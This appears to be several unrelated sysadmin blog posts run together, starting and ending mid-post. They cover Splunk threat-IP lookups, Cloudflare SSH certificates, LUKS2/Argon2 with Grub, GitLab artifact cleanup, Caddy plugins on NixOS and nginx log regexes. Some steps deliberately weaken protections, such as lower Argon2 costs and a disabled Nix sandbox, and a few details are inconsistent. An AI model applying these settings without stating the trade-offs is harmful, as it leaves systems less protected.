187.190.252.167 | 187.190.252.167 | 32 | 187.190.252.167/32 | Emerging Threats: Known Compromised Hosts | 2023-01-30T08:03:00Z |
89.248.163.0 | 89.248.163.255 | 24 | 89.248.163.0/24 | Dshield | 2023-01-30T08:01:00Z |
index=firewall
| lookup opendbl_ip cidr_range AS dst OUTPUT name AS threat
src | src_port | dst | action | threat |
---|---|---|---|---|
192.168.1.5 | 45454 | 187.190.252.167 | allowed | Emerging Threats: Known Compromised Hosts |
192.168.1.3 | 45452 | 7.6.5.4 | allowed | |
192.168.1.4 | 45457 | 4.3.2.1 | allowed | |
192.168.1.6 | 45451 | 89.248.163.100 | allowed | Dshield |
One unpleasant task I had previously in an enterprise with Linux servers was SSH key management, specifically checking that the SSH public keys of departed staff had been removed from the Ansible config. Then I learned from this article that it is possible to SSH using a short-lived (<1 day) certificate that is only issued to the user after successfully authenticating with the enterprise identity provider’s (e.g. Azure AD) single sign-on (SSO). This means once a user is revoked from the identity provider, that user will not be issued a new certificate to SSH again the next day. At that time, I didn’t feel like configuring and integrating an identity provider, so I held off trying the feature.
Recently, I wanted to try out the Cloudflare Zero Trust free tier. While reading through the SSH configuration guide, I found out that Cloudflare supports issuing SSH user certificates. While Cloudflare supports several SSO integrations, it also supports authenticating using a one-time PIN sent to an email address that does not have to be a Cloudflare account. Cloudflare also supports a browser-based shell, just like AWS Session Manager.
Navigate to the Zero Trust page shown in the sidebar after you log in to dash.cloudflare.com. If this is your first time, Cloudflare will ask for billing info, for which you can use an existing payment method or add a new credit card. You won’t get charged as long as you stay within the free tier (50 users); I will show you how to check later in this article.
The setup will then ask you to name your team domain team-name.cloudflareaccess.com. Just create a random name for now; you can always change it later.
Once you’re in Zero Trust console, navigate to Access → Applications. Add an application and choose Self-hosted.
Configure app tab,
Add policies tab,
Setup tab:
Navigate to Access → Service Auth → SSH tab. Select the application you just created and Generate certificate.
Copy the generated public key and save it to /etc/ssh/ca.pub in your host (the host you’re going to SSH into).
sudo -e /etc/ssh/ca.pub
Navigate to Access → Tunnels
Install connector tab, choose the relevant OS and run the installation command. Once installed, you should see “connected” status.
Route tunnel tab,
After finishing creating a tunnel, you should have a new CNAME DNS record that points to tunnel-id.cfargotunnel.com. If there is no CNAME entry, grab the tunnel ID and create a new DNS record.
Install openssh-server.
sudo -e /etc/ssh/sshd_config.d/cf.conf
TrustedUserCAKeys /etc/ssh/ca.pub
ListenAddress 127.0.0.1
ListenAddress ::1
PasswordAuthentication no
# Uncomment below line for custom port
# Port 1234
Run systemctl restart ssh or systemctl restart sshd.
The easiest setup is one where a Unix username matches the email that you configured to receive one-time PIN in previous steps. For example, if you set loremipsum@youremail.com, then create a new user loremipsum.
sudo adduser loremipsum
Set a random password and leave everything else blank.
To match loremipsum@youremail.com to lipsum user:
Match user lipsum
    AuthorizedPrincipalsCommand /bin/echo 'loremipsum'
    AuthorizedPrincipalsCommandUser nobody
loremipsum+somealias@youremail.com also works.
Match user lipsum
    AuthorizedPrincipalsCommand /bin/echo 'loremipsum+somealias'
    AuthorizedPrincipalsCommandUser nobody
For NixOS users, AuthorizedPrincipalsCommand will not work because the command would run within “/nix/store”, which is read-only. Instead, you should use AuthorizedPrincipalsFile. This config also lets you match multiple emails to a username; just separate each email user by a newline. This applies to all OpenSSH instances, not just NixOS.
echo 'loremipsum' | sudo tee /etc/ssh/authorized_principals
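To map more than one email to the same Unix user, list each email's local part on its own line; a sketch (the second name is a made-up example):

```bash
printf 'loremipsum\nanotheruser\n' | sudo tee /etc/ssh/authorized_principals
```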
services.openssh = {
  enable = true;
  permitRootLogin = "no";
  passwordAuthentication = false;
  # ports = [ 1234 ];
  extraConfig = ''
    TrustedUserCAKeys /etc/ssh/ca.pub
    Match User lipsum
      AuthorizedPrincipalsFile /etc/ssh/authorized_principals
      # if there is no existing AuthenticationMethods
      AuthenticationMethods publickey
  '';
};

### Other use cases

https://developers.cloudflare.com/cloudflare-one/identity/users/short-lived-certificates/#2-ensure-unix-usernames-match-user-sso-identities

## Initiate SSH connection

Install `cloudflared` on the host that you're going to SSH from.

`cloudflared access ssh-config --hostname test.yourdomain.com --short-lived-cert`

Example output:

# ~/.ssh/config
Match host test.yourdomain.com exec "/usr/local/bin/cloudflared access ssh-gen --hostname %h"
  ProxyCommand /usr/local/bin/cloudflared access ssh --hostname %h
  IdentityFile ~/.cloudflared/%h-cf_key
  CertificateFile ~/.cloudflared/%h-cf_key-cert.pub
or
Host test.yourdomain.com
  ProxyCommand bash -c '/usr/local/bin/cloudflared access ssh-gen --hostname %h; ssh -tt %r@cfpipe-test.yourdomain.com >&2 <&1'

Host cfpipe-test.yourdomain.com
  HostName test.yourdomain.com
  ProxyCommand /usr/local/bin/cloudflared access ssh --hostname %h
  IdentityFile ~/.cloudflared/test.yourdomain.com-cf_key
  CertificateFile ~/.cloudflared/test.yourdomain.com-cf_key-cert.pub
Save the output to $HOME/.ssh/config.
Now, the moment of truth.
ssh loremipsum@test.yourdomain.com
(replace the username with the one you created in Create a test user step.)
The terminal should launch a website to team-name.cloudflareaccess.com. Enter the email you configured in Add an application step and then enter the received 6-digit PIN.
Back to the terminal, wait for at least 5 seconds and you should see the usual SSH authentication.
You may be wondering why you still see a fingerprint warning; I find this article, SSH Best Practices using Certificates, 2FA and Bastions, explains it well.
As a bonus, head to test.yourdomain.com (see the Add an application step), which will redirect you to a login page just like the previous step. After logging in with a 6-digit PIN, you shall see a browser-based shell.
Head to Settings → Account to monitor how many users you have; each email address you configured to receive a one-time PIN is counted as one user.
To delete user(s), head to Users, tick the relevant users, Update status and then Remove. The seat usage column should show Inactive.
ssh-keygen -L -f ~/.cloudflared/test.yourdomain.com-cf_key-cert.pub
I ticked “Encrypt system” and Manjaro created two partitions in my NVMe drive without LVM. Btrfs subvolume can provide LVM-like functionality.
Partition | Filesystem | Mount | Encrypted |
---|---|---|---|
/dev/nvme0n1p1 | FAT32 | /boot/efi | No |
/dev/nvme0n1p2 | Btrfs | / | LUKS1 |
The implication of the above layout is that /boot (where the kernel resides) is encrypted, except for /boot/efi (where Grub resides): p1 is not encrypted, p2 is LUKS-encrypted. So, Grub has to unlock the LUKS partition first (using a password) before the rest of / can be unlocked (using a keyfile). A keyfile is used in this layout so that the password is not prompted twice.
There are two disadvantages of using Grub to unlock LUKS:
Fortunately, there is an AUR package grub-improved-luks2-git that has been patched for Argon2 support. I will also show how to tune Argon2 parameters for faster unlock (while sacrificing security).
Use your favourite AUR helper to install grub-improved-luks2-git. This will take a while to compile patched Grub.
yay -S grub-improved-luks2-git
There should be a confirmation to remove grub to avoid package conflict.
Reboot into a live USB. Identify the encrypted partition using GParted; its filesystem should show as “[Encrypted] btrfs”. In my case, it is /dev/nvme0n1p2.
sudo cryptsetup convert --type luks2 /dev/nvme0n1p2
If you want to revert back to LUKS1,
sudo cryptsetup convert --type luks1 /dev/nvme0n1p2
Before reverting back to LUKS1, the keyslot must be using PBKDF2, not Argon2; otherwise you will encounter a “Cannot convert to LUKS1 format” error.
sudo cryptsetup luksConvertKey --pbkdf pbkdf2 /dev/nvme0n1p2
At this stage, the Grub bootloader (not the package) cannot unlock the LUKS2 partition yet. It needs to be reinstalled so that it can detect LUKS2 partition and load the relevant module.
First, unlock the partition and mount it.
sudo cryptsetup open /dev/nvme0n1p2 root
sudo mount -o subvol=@ /dev/mapper/root /mnt
sudo mount /dev/nvme0n1p1 /mnt/boot/efi
Notice in the “grub.cfg” that it loads the luks module instead of luks2; this explains why Grub couldn’t unlock it.
$ sudo less /mnt/boot/grub/grub.cfg
menuentry 'Manjaro Linux' {
  insmod luks
}
While you could manually update the config and replace luks with luks2, it is better to automate it using grub-mkconfig.
sudo manjaro-chroot /mnt /bin/bash
# or `sudo arch-chroot /mnt /bin/bash`
grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=manjaro --recheck
grub-mkconfig -o /boot/grub/grub.cfg
Now, inspect “grub.cfg” again while still in the chroot; you should see luks2 instead.
$ less /boot/grub/grub.cfg
menuentry 'Manjaro Linux' {
  insmod luks2
}
Before proceeding to the next step, I recommend rebooting into your Manjaro/Arch to check whether Grub can unlock LUKS2. Once that is done, reboot again into the live USB.
This step should be done in live USB
All keyslot parameters are retained during conversion to LUKS2, so the pbkdf algorithm is still PBKDF2 + SHA256. To convert to Argon2 + SHA512,
sudo cryptsetup luksConvertKey --pbkdf argon2id --hash sha512 /dev/nvme0n1p2
You may notice an insmod gcry_sha256 line in the “grub.cfg”; this module is not used for LUKS2 unlocking, so there is no need to add insmod gcry_sha512. As long as insmod luks2 is there, Grub should be able to unlock LUKS2 regardless of the pbkdf or hash algorithm.
Still in live USB
sudo cryptsetup --allow-discards --perf-no_read_workqueue --perf-no_write_workqueue --persistent open /dev/nvme0n1p2 root
Verify the flags are set.
$ sudo cryptsetup luksDump /dev/nvme0n1p2 | grep Flags
Flags:          allow-discards no-read-workqueue no-write-workqueue
More details:
This step can be done while the drive is mounted (as in not in live USB)
Due to the lack of cryptographic acceleration, Grub takes half a minute to unlock LUKS. For a faster unlock, the Argon2 parameters can be tuned down, at the cost of security.
To start off, have a try with these parameters:
sudo cryptsetup luksConvertKey /dev/nvme0n1p2 --pbkdf-force-iterations 4 --pbkdf-memory 262100
sudo cryptsetup luksConvertKey /dev/nvme0n1p2 --pbkdf-force-iterations 4 --pbkdf-memory 262100 --key-file /crypto_keyfile.bin
This page explains why keyfile also needs to be updated.
Reboot and check how fast the unlock is. Fine-tune the --pbkdf-memory option until the unlock speed is satisfactory (not too slow and not too fast). The option takes a value in kilobytes (KB).
MB | KB |
---|---|
128 | 131100 |
256 | 262100 |
512 | 524300 |
1024 | 1049000 |
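To see which Argon2 parameters are currently set on the keyslot, the LUKS header can be inspected; a sketch (the exact field names in the output may vary between cryptsetup versions):

```bash
sudo cryptsetup luksDump /dev/nvme0n1p2 | grep -E 'PBKDF|Time cost|Memory|Threads'
```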
In all my projects that were using more than 5 GB, 99% of the usage came from job artifacts. I believe most of the cases are like this. The first thing I did was to set new job artifacts to expire in a week, the default is 30 days. Existing job artifacts are not affected by this setting.
If your job artifacts created in a month are much less than 5 GB in total yet still exceed the quota, it is likely caused by very old artifacts which have no expiry. In that case, reducing the default expiry may not be relevant, those old artifacts should be removed instead.
 build:
   artifacts:
     paths:
       - public/
+    expire_in: 1 week
As for cleaning up existing job artifacts, I found the following bash script on the GitLab forum. I fixed some variable typos and changed the starting page to “2”, so all job artifacts will be removed except for the first page, retaining the 100 most recent job artifacts. The only dependencies are curl and jq.
This script is especially useful for removing job artifacts that were created before 22 Jun 2020, because artifacts created before that date do not expire.
#!/bin/bash
# https://forum.gitlab.com/t/remove-all-artifact-no-expire-options/9274/12
# Copyright 2021 "Holloway" Chew, Kean Ho <kean.ho.chew@zoralab.com>
# Copyright 2020 Benny Powers (https://forum.gitlab.com/u/bennyp/summary)
# Copyright 2017 Adam Boseley (https://forum.gitlab.com/u/adam.boseley/summary)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

############### user input ###############
# project ID (Help: goto "Settings" > "General")
projectID=""
# user API token (Help: "User Settings" > "Access Tokens" > tick "api")
token=""
# gitlab server instance
server="gitlab.com"
# CI Jobs pagination (Help: "CI/CD" > "Jobs" > see bottom pagination bar)
#
# NOTE: user interface might be bug. If so, you need to manually calculate.
# By default, maximum 10,000 (end_page * per_page) job artifacts will be removed, while retaining 100 most recent artifacts.
# Example:
# 1. For 123 jobs in the past and per_page is "100" (maximum), it has 2 pages (end_page) in total
#    [end_page = ROUND_UP(total_job / per_page)].
# 2. To retain most recent 200 jobs
#    [start_page = num_job_retain / per_page + 1]
start_page="2"
end_page="100"
per_page="100"
# GitLab API version
api="v4"

##################### internal function #####################
delete() {
	# page
	page="$1"
	1>&2 printf "Cleaning page ${page}...\n"

	# build internal variables
	baseURL="https://${server}/api/${api}/projects"

	# get list from servers for the page
	url="${baseURL}/${projectID}/jobs/?page=${page}&per_page=${per_page}"
	1>&2 printf "Calling API to get lob list: ${url}\n"
	list=$(curl --globoff --header "PRIVATE-TOKEN:${token}" "$url" \
		| jq -r ".[].id")
	if [ ${#list[@]} -eq 0 ]; then
		1>&2 printf "list is empty\n"
		return 0
	fi

	# remove all jobs from page
	for jobID in ${list[@]}; do
		url="${baseURL}/${projectID}/jobs/${jobID}/erase"
		1>&2 printf "Calling API to erase job: ${url}\n"
		curl --request POST --header "PRIVATE-TOKEN:${token}" "$url"
		1>&2 printf "\n\n"
	done
}

main() {
	# check dependencies
	if [ -z $(type -p jq) ]; then
		1>&2 printf "[ ERROR ] need 'jq' dependency to parse json."
		exit 1
	fi

	# loop through each pages from given start_page to end_page inclusive
	for ((i=start_page; i<=end_page; i++)); do
		delete $i
	done

	# return
	exit 0
}

main $@
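After filling in projectID and token, running it is straightforward (the file name below is my own choice, not from the forum post):

```bash
chmod +x gitlab-artifact-cleanup.sh
./gitlab-artifact-cleanup.sh
```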
Project | Before | After | Runtime |
---|---|---|---|
malware-filter (project) | 15.12 GB | 6.3 GB | 46m 15s |
phishing-filter | 6.02 GB | 949 MB | 1h 35m 17s |
pup-filter | 1.16 GB | 480.4 MB | 57m 45s |
tracking-filter | 106.68 MB | 105.3 MB | 4m 38s |
urlhaus-filter | 2.64 GB | 908 MB | 1h 50m 19s |
vn-badsite-filter | 283.12 MB | 114.8 MB | 19m 52s |
Previous method no longer works on 22.11. Refer to xcaddy section instead.
Caddy, like any other web server, is extensible through plugins. Plugins are usually installed using xcaddy; using it is as easy as $ xcaddy build --with github.com/caddyserver/ntlm-transport to build the latest caddy binary with the ntlm-transport plugin.
NixOS has its own way of building Go package (Caddy is written in Go), so using xcaddy may be counterintuitive. The Nix-way to go is to build a custom package using a “*.nix” file and instruct the service (also known as a module in Nix ecosystem) to use that package instead of the repo’s.
In NixOS, the Caddy module has long included the services.caddy.package option to specify a custom package. It was primarily used as a way to install Caddy 2 from the unstable channel (unstable.caddy) because the package in the stable channel (pkgs.caddy) of NixOS 20.03 was still Caddy 1. I talked about that option in a previous post.
Aside from installing Caddy from a different channel, that option can also be used to specify a custom package by using pkgs.callPackage. I previously used callPackage as a workaround to install cloudflared in an IPv6-only instance from a repository other than GitHub, because GitHub doesn’t support IPv6 yet.
If a custom package is defined in “/etc/caddy/custom-package.nix”, then the configuration will be:
services.caddy = {
  enable = true;
  package = pkgs.callPackage /etc/caddy/custom-package.nix { };
};
The following package patches the “main.go“ file of the upstream source to insert additional plugins. The code snippet is courtesy of @diamondburned. The marked lines show how plugins are specified through the plugins option.
{ lib, buildGoModule, fetchFromGitHub, plugins ? [], vendorSha256 ? "" }:

with lib;

let
  imports = flip concatMapStrings plugins (pkg: "\t\t\t_ \"${pkg}\"\n");

  main = ''
    package main

    import (
      caddycmd "github.com/caddyserver/caddy/v2/cmd"

      _ "github.com/caddyserver/caddy/v2/modules/standard"
    ${imports}
    )

    func main() {
      caddycmd.Main()
    }
  '';
in buildGoModule rec {
  pname = "caddy";
  version = "2.4.6";

  subPackages = [ "cmd/caddy" ];

  src = fetchFromGitHub {
    owner = "caddyserver";
    repo = pname;
    # https://github.com/NixOS/nixpkgs/blob/nixos-21.11/pkgs/servers/caddy/default.nix
    rev = "v${version}";
    sha256 = "sha256-xNCxzoNpXkj8WF9+kYJfO18ux8/OhxygkGjA49+Q4vY=";
  };

  inherit vendorSha256;

  overrideModAttrs = (_: {
    preBuild = "echo '${main}' > cmd/caddy/main.go";
    postInstall = "cp go.sum go.mod $out/ && ls $out/";
  });

  postPatch = ''
    echo '${main}' > cmd/caddy/main.go
    cat cmd/caddy/main.go
  '';

  postConfigure = ''
    cp vendor/go.sum ./
    cp vendor/go.mod ./
  '';

  meta = with lib; {
    homepage = https://caddyserver.com;
    description = "Fast, cross-platform HTTP/2 web server with automatic HTTPS";
    license = licenses.asl20;
    maintainers = with maintainers; [ rushmorem fpletz zimbatm ];
  };
}
Specify the desired plugins in services.caddy.package.plugins:
services.caddy = {
  enable = true;
  package = (pkgs.callPackage /etc/caddy/custom-package.nix {
    plugins = [
      "github.com/caddyserver/ntlm-transport"
      "github.com/caddyserver/forwardproxy"
    ];
    vendorSha256 = "0000000000000000000000000000000000000000000000000000";
  });
};
The above example will install the ntlm-transport and forwardproxy plugins. The first run of nixos-rebuild will fail due to a mismatched vendorSha256; simply replace the “000…” with the expected value and the second run should be ok.
Since the Nix-way of building custom Caddy plugins no longer works in 22.11, I resorted to the Caddy-way instead, by using xcaddy. The implication of using xcaddy is that the Nix sandbox can no longer be enabled, because the sandbox does not even allow network access. The Nix sandbox is enabled by default in NixOS; to disable it:
nix.settings.sandbox = false;
Then run sudo nixos-rebuild switch to apply the config. Verify the generated config in /etc/nix/nix.conf.
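A quick way to confirm the setting landed in the generated file (a sketch; the exact formatting of nix.conf may differ):

```bash
grep sandbox /etc/nix/nix.conf
# expected to show: sandbox = false
```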
Nix sandbox is not a security feature, rather it is used to provide reproducibility, its fundamental feature. When enabled, each build will run in an isolated environment not affected by the system configuration. This feature is essential when contributing to Nixpkgs to ensure that a successful build does not depend on the contributor’s system configuration. For example, all dependencies should be declared even when the contributor’s system already installed all or some beforehand; a build will fail if there is any undeclared dependency.
The following package will always use the latest caddy release.
{ pkgs, config, plugins, ... }:

with pkgs;

stdenv.mkDerivation rec {
  pname = "caddy";
  # https://github.com/NixOS/nixpkgs/issues/113520
  version = "latest";
  dontUnpack = true;

  nativeBuildInputs = [ git go xcaddy ];

  configurePhase = ''
    export GOCACHE=$TMPDIR/go-cache
    export GOPATH="$TMPDIR/go"
  '';

  buildPhase = let
    pluginArgs = lib.concatMapStringsSep " " (plugin: "--with ${plugin}") plugins;
  in ''
    runHook preBuild
    ${xcaddy}/bin/xcaddy build latest ${pluginArgs}
    runHook postBuild
  '';

  installPhase = ''
    runHook preInstall
    mkdir -p $out/bin
    mv caddy $out/bin
    runHook postInstall
  '';
}
If you prefer to specify a version, modify the following lines:
# line 7
version = "2.6.4";

# line 12
${xcaddy}/bin/xcaddy build "v${version}" ${pluginArgs}
To install the above package, use the same config shown in the Install custom package section but remove the vendorSha256 line. Remember to run nixos-rebuild again.
To illustrate, say we have a log format like this:
{id} "{http.request.host}" "{http.request.header.user-agent}"
An example log is:
123 "example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"
While you could search for a specific keyword, e.g. attempts of the Log4shell exploit, since there are no fields, you cannot run any statistics like table or stats on the search results.
Splunk is able to understand the Apache log format because its field extractor already includes the necessary regex patterns to parse the relevant fields of each line in a log. Choosing a source type is equivalent to choosing a log format. If a format is not listed in the default list, we can either use an add-on or create new fields using the field extractor. There is a Splunk add-on for nginx and I suggest trying it before resorting to the field extractor.
I created five patterns which cover most of the nginx events I encountered during my work. Refer to the documentation for the supported syntax.
A field is extracted through a “capturing group”.
(?<field_name>capture pattern)
For example, (?<month>\w+) searches for one or more (+) alphanumeric characters (\w) and names the field month. I opted for lazier matching, mostly using the unbounded quantifier + instead of a stricter range of occurrences {M,N}, despite knowing the exact pattern of a field. I found some fields may stray slightly from the expected pattern, so lazier matching tends to match more events without matching unwanted ones.
(?<month>\w+)\s+(?<day>\d+)\s(?<time>[\d\:]+)\s(?<proxy_ip>[\d\.]+)(?:\snginx\:\s)(?<remote_ip>[\d\.]+)(?:\s\d+\s\S+\s\S+\s)\[(?<time_local>\S+)\s(?<timezone>\+\d{4})\]\s"(?<http_method>\w+)\s(?<http_path>.+)\s(?<http_version>HTTP/\d\.\d)"\s(?<http_status>\d{3})\s(?:\d+)\s"(?<request_url>.[^"]*)"\s"(?<http_user_agent>.[^"]*)"\s(?<server_ip>[\d\.]+)\:(?<server_port>\d+)(?:\s\d+\s\d+\s)(?<ssl_version>\S+)\s(?<ssl_cipher>\S+)\s(?<http_cookie>\S+)
Dec 24 01:23:45 192.168.0.2 nginx: 1.2.3.4 55763 - - [24/Dec/2021:01:23:45 +0000] "GET /page.html HTTP/2.0" 200 494 "https://www.example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" 192.168.1.2:8080 123 4 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 abcdef .
Field | Value | Regex | Explanation |
---|---|---|---|
month | Dec | (?<month>\w+) | One or more alphanumeric characters |
day | 24 | (?<day>\d+) | One or more digits |
time | 01:23:45 | (?<time>[\d\:]+) | One or more digits or colons |
proxy_ip | 192.168.0.2 | (?<proxy_ip>[\d\.]+) | One or more digits or dots |
remote_ip | 1.2.3.4 | (?<remote_ip>[\d\.]+) | |
time_local | 24/Dec/2021:01:23:45 | (?<time_local>\S+) | One or more non-whitespace characters |
timezone | +0000 | (?<timezone>[\+\-]\d{4}) | Four digits with plus or minus prefix |
http_method | GET | (?<http_method>\w+) | |
http_path | /page.html | (?<http_path>.+) | One or more of any character |
http_version | HTTP/2.0 | (?<http_version>HTTP/\d\.\d) | “HTTP”, a digit, dot and digit |
http_status | 200 | (?<http_status>\d{3}) | Three digits |
request_url | https://www.example.com | (?<request_url>.[^"]*) | Zero or more of any character except double quote |
http_user_agent | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | (?<http_user_agent>.[^"]*) | |
server_ip | 192.168.1.2 | (?<server_ip>[\d\.]+) | |
server_port | 8080 | (?<server_port>\d+) | |
ssl_version | TLSv1.2 | (?<ssl_version>\S+) | |
ssl_cipher | ECDHE-RSA-AES128-GCM-SHA256 | (?<ssl_cipher>\S+) | |
http_cookie | abcdef | (?<http_cookie>\S+) |
nginx is configured as a reverse proxy; proxy_ip is its IP, whereas server_ip is the upstream's.
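To sanity-check the pattern outside Splunk, a rough Python sketch is shown below. It reuses the pattern and sample event above and only rewrites the named groups into Python's (?P<name>...) syntax; the pattern has no lookbehinds, so a plain string replace is safe here.

import re

# Splunk-style extraction pattern and sample event from above
splunk_pattern = r'(?<month>\w+)\s+(?<day>\d+)\s(?<time>[\d\:]+)\s(?<proxy_ip>[\d\.]+)(?:\snginx\:\s)(?<remote_ip>[\d\.]+)(?:\s\d+\s\S+\s\S+\s)\[(?<time_local>\S+)\s(?<timezone>\+\d{4})\]\s"(?<http_method>\w+)\s(?<http_path>.+)\s(?<http_version>HTTP/\d\.\d)"\s(?<http_status>\d{3})\s(?:\d+)\s"(?<request_url>.[^"]*)"\s"(?<http_user_agent>.[^"]*)"\s(?<server_ip>[\d\.]+)\:(?<server_port>\d+)(?:\s\d+\s\d+\s)(?<ssl_version>\S+)\s(?<ssl_cipher>\S+)\s(?<http_cookie>\S+)'
event = 'Dec 24 01:23:45 192.168.0.2 nginx: 1.2.3.4 55763 - - [24/Dec/2021:01:23:45 +0000] "GET /page.html HTTP/2.0" 200 494 "https://www.example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" 192.168.1.2:8080 123 4 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 abcdef .'

# Splunk accepts (?<name>...); Python's re needs (?P<name>...)
pattern = re.compile(splunk_pattern.replace('(?<', '(?P<'))

match = pattern.search(event)
if match:
    for field, value in match.groupdict().items():
        print(f'{field} = {value}')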
(?<month>\w+)\s+(?<day>\d+)\s(?<time>[\d\:]+)\s(?<proxy_ip>[\d\.]+)(?:\snginx\:\s)(?<year>\d{4})\/(?<nmonth>\d{2})(?:\/\d{2}\s[\d\:]+\s)\[(?<log_level>\w+)\](?:\s\d+#\d+\:\s\*\d+\sclient\s)(?<remote_ip>[\d\.]+)\:(?<remote_port>\d+)(?:\sconnected\sto\s)(?<server_ip>[\d\.]+)\:(?<server_port>\d+)
Dec 24 01:23:45 192.168.0.2 nginx: 2021/12/24 01:23:45 [info] 1776#1776:*114333142 client 1.2.3.4:19802 connected to 192.168.1.2:8080
Field | Value | Regex | Explanation |
---|---|---|---|
month | Dec | (?<month>\w+) | |
day | 24 | (?<day>\d+) | |
time | 01:23:45 | (?<time>[\d\:]+) | |
proxy_ip | 192.168.0.2 | (?<proxy_ip>[\d\.]+) | |
year | 2021 | (?<year>\d{4}) | |
nmonth | 12 | (?<nmonth>\d{2}) | |
log_level | info | (?<log_level>\w+) | |
remote_ip | 1.2.3.4 | (?<remote_ip>[\d\.]+) | |
remote_port | 19802 | (?<remote_port>\d+) | |
server_ip | 192.168.1.2 | (?<server_ip>[\d\.]+) | |
server_port | 8080 | (?<server_port>\d+) |
(?<month>\w+)\s+(?<day>\d+)\s(?<time>[\d\:]+)\s(?<proxy_ip>[\d\.]+)(?:\snginx\:\s)(?<year>\d{4})\/(?<nmonth>\d{2})(?:\/\d{2}\s[\d\:]+\s)\[(?<log_level>\w+)\](?:\s\d+#\d+\:\s\*\d+\s)(?<upstream_error>.[^,]*)(?:,\sclient\:\s)(?<remote_ip>[\d\.]+)(?:,\sserver\:\s)(?<server_host>.[^,]*)(?:,\srequest\:\s")(?<http_method>\w+)\s(?<http_path>\S+)\s(?<http_version>HTTP/\d\.\d)(?:",\supstream\:\s")(?<upstream_url>.[^"]*)",\shost\:\s"(?<upstream_host>.[^"]*)
Dec 24 01:23:45 192.168.0.2 nginx: 2021/12/24 01:23:45 [error] 1776#1776:*71197740 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 1.2.3.4, server: example.com, request: "POST /api/path HTTP/2.0",upstream: "http://192.168.1.2:8080/api/path", host:"example.com"
Field | Value | Regex | Explanation |
---|---|---|---|
month | Dec | (?<month>\w+) | |
day | 24 | (?<day>\d+) | |
time | 01:23:45 | (?<time>[\d\:]+) | |
proxy_ip | 192.168.0.2 | (?<proxy_ip>[\d\.]+) | |
year | 2021 | (?<year>\d{4}) | |
nmonth | 12 | (?<nmonth>\d{2}) | |
log_level | error | (?<log_level>\w+) | |
upstream_error | upstream timed out (110: Connection timed out) while reading response header from upstream | (?<upstream_error>.[^,]*) | Zero or more of any character except comma |
remote_ip | 1.2.3.4 | (?<remote_ip>[\d\.]+) | |
server_host | example.com | (?<server_host>.[^,]*) | |
http_method | POST | (?<http_method>\w+) | |
http_path | /api/path | (?<http_path>\S+) | |
http_version | HTTP/2.0 | (?<http_version>HTTP/\d\.\d) | |
upstream_url | http://192.168.1.2:8080/api/path | (?<upstream_url>.[^"]*) | |
upstream_host | example.com | (?<upstream_host>.[^"]*) |
(?<month>\w+)\s+(?<day>\d+)\s(?<time>[\d\:]+)\s(?<proxy_ip>[\d\.]+)(?:\snginx\:\s)(?<year>\d{4})\/(?<nmonth>\d{2})(?:\/\d{2}\s[\d\:]+\s)\[(?<log_level>\w+)\](?:\s\d+#\d+\:\s\*\d+\s)(?<upstream_error>[^,]*,[^,]*)(?:,\sclient\:\s)(?<remote_ip>[\d\.]+)(?:,\sserver\:\s)(?<server_host>.[^,]*)(?:,\srequest\:\s")(?<http_method>\w+)\s(?<http_path>\S+)\s(?<http_version>HTTP/\d\.\d)(?:",\supstream\:\s")(?<upstream_url>.[^"]*)(?:",\shost\:\s")(?<upstream_host>.[^"]*)
Dec 24 01:23:45 192.168.0.2 nginx: 2021/12/24 01:23:45 [info] 13199#13199: *81574833 epoll_wait() reported that client prematurely closed connection, so upstream connection is closed too while connecting to upstream, client: 1.2.3.4, server: example.com, request: "GET /page.html HTTP/1.1", upstream:"http://192.168.1.2/page.html", host: "example.com"
Field | Value | Regex | Explanation |
---|---|---|---|
month | Dec | (?<month>\w+) | |
day | 24 | (?<day>\d+) | |
time | 01:23:45 | (?<time>[\d\:]+) | |
proxy_ip | 192.168.0.2 | (?<proxy_ip>[\d\.]+) | |
year | 2021 | (?<year>\d{4}) | |
nmonth | 12 | (?<nmonth>\d{2}) | |
log_level | info | (?<log_level>\w+) | |
upstream_error | epoll_wait() reported that client prematurely closed connection, so upstream connection is closed too while connecting to upstream | (?<upstream_error>[^,]*,[^,]*) | |
remote_ip | 1.2.3.4 | (?<remote_ip>[\d\.]+) | |
server_host | example.com | (?<server_host>.[^,]*) | |
http_method | GET | (?<http_method>\w+) | |
http_path | /page.html | (?<http_path>\S+) | |
http_version | HTTP/1.1 | (?<http_version>HTTP/\d\.\d) | |
upstream_url | http://192.168.1.2/page.html | (?<upstream_url>.[^"]*) | |
upstream_host | example.com | (?<upstream_host>.[^"]*) |
(?<month>\w+)\s+(?<day>\d+)\s(?<time>[\d\:]+)\s(?<proxy_ip>[\d\.]+)(?:\snginx\:\s)(?<year>\d{4})\/(?<nmonth>\d{2})(?:\/\d{2}\s[\d\:]+\s)\[(?<log_level>\w+)\](?:\s\d+#\d+\:\s\*\d+\s)(?<upstream_error>[^,]*,[^,]*)(?:,\sclient\:\s)(?<remote_ip>[\d\.]+)(?:,\sserver\:\s)(?<server_host>.[^,]*)(?:,\srequest\:\s")(?<http_method>\w+)\s(?<http_path>\S+)\s(?<http_version>HTTP/\d\.\d)(?:",\supstream\:\s")(?<upstream_url>.[^"]*)(?:",\shost\:\s")(?<upstream_host>.[^"]*)(?:",\sreferrer\:\s")(?<referrer>.[^"]*)
Dec 24 01:23:45 192.168.0.2 nginx: 2021/12/24 01:23:45 [info] 1776#1776:*71220252 epoll_wait() reported that client prematurely closed connection, so upstream connection is closed too while sending request to upstream, client: 1.2.3.4, server: example.com, request: "GET /page.html HTTP/1.1", upstream: "http://192.168.1.2:8080/page.html", host: "example.com", referrer: "https://example.com"
Field | Value | Regex | Explanation |
---|---|---|---|
month | Dec | (?<month>\w+) | |
day | 24 | (?<day>\d+) | |
